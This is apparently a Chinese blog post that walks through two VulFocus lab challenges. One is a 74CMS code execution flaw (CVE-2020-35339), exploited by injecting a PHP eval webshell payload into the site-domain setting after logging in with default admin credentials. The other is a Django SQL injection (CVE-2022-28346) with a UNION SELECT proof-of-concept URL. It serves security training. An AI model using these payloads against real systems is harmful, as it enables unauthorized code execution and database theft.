漏洞指北-VulFocus靶场专栏-高级01

漏洞指北-VulFocus靶场专栏-高级01

  • 高级001 骑士cms任意代码执行(CVE-2020-35339)
        • step1:进入页面,登入后台
        • step2 系统——网站配置——网站域名
        • step3 中国蚁剑连接
  • 高级002 Django SQL注入 (CVE-2022-28346)
        • step1:进入网页
        • step2:进入报错页 demo
        • step3 直接查找flag

高级001 骑士cms任意代码执行(CVE-2020-35339)

原因
后台账号密码均为adminadmin
解决方案:

step1:进入页面,登入后台

http://10.11.12.28:63059/index.php?m=Admin&c=index&a=login
在这里插入图片描述

step2 系统——网站配置——网站域名

http://127.0.0.1/.‘,eval($_POST[111]),’/.com
漏洞指北-VulFocus靶场专栏-高级01_第1张图片

step3 中国蚁剑连接

漏洞指北-VulFocus靶场专栏-高级01_第2张图片

高级002 Django SQL注入 (CVE-2022-28346)

原因
在 2.2.28 之前的 Django 2.2、3.2.13 之前的 3.2 和 4.0.4 之前的 4.0 中发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法会通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。 访问:http://ip:port/demo?field=demo.name POC: http://ip:port/demo?field=demo.name" FROM “demo_user” union SELECT “1”,sqlite_version(),“3”

解决方案:

step1:进入网页

在这里插入图片描述

step2:进入报错页 demo

http://10.11.12.28:31079/demo/
漏洞指北-VulFocus靶场专栏-高级01_第3张图片

step3 直接查找flag

漏洞指北-VulFocus靶场专栏-高级01_第4张图片

你可能感兴趣的:(VulFocus漏洞指北,网络安全)